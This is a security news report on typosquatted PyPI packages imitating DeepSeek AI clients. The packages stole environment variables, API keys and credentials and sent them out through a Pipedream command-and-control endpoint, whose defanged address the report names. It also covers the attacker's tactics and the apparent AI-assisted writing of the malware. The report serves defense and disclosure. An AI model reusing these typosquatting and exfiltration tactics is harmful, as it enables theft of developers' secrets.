Security researchers at Positive Technologies have uncovered a sophisticated supply chain attack targeting users of DeepSeek AI through malicious packages distributed via the Python Package Index (PyPI). The attack, which leveraged typosquatting techniques, demonstrates the growing sophistication of threat actors targeting artificial intelligence development communities.
Attack Vector and Technical Analysis
On January 29, 2024, an attacker operating under the username “bvk” published two malicious packages named deepseeek and deepseekai, deliberately misspelling the legitimate DeepSeek AI client names. The account, despite being created in June 2023, remained dormant until launching this attack, a common tactic used by threat actors to establish perceived legitimacy.
Malware Functionality and Data Exfiltration
The malicious packages functioned as sophisticated information stealers, activating upon execution of specific console commands. The primary payload was designed to harvest sensitive information, including:
– Environment variables
– API keys for cloud services
– Database credentials
– Infrastructure access tokens
Command and Control Infrastructure
The attackers employed Pipedream, an integration platform, for data exfiltration, utilizing a command-and-control server at eoyyiyqubj7mquj.m.pipedream[.]net. This approach demonstrates sophisticated operational security measures, as legitimate integration platforms can help malicious traffic blend with normal development activities.
Impact Assessment and Detection
The malicious packages achieved significant distribution before detection, with over 200 recorded downloads:
– 36 installations via pip package manager and bandersnatch mirroring
– 186 downloads through browsers and various development tools
Thanks to PT PyAnalysis system’s rapid detection capabilities, the malicious activity was identified within minutes of package publication.
AI-Assisted Malware Development
A notable aspect of this campaign is the evident use of AI assistance in malware development, confirmed by distinctive code comments. This represents an emerging trend where artificial intelligence tools are being leveraged for both defensive and offensive security operations.
This incident serves as a critical reminder of supply chain security risks in the Python ecosystem. Organizations and developers should implement strict package verification procedures, including checking package names for typosquatting, verifying publisher credentials, and maintaining comprehensive dependency audit processes. Additionally, implementing automated security scanning tools and maintaining an allow-list of trusted packages can significantly reduce exposure to similar supply chain attacks.
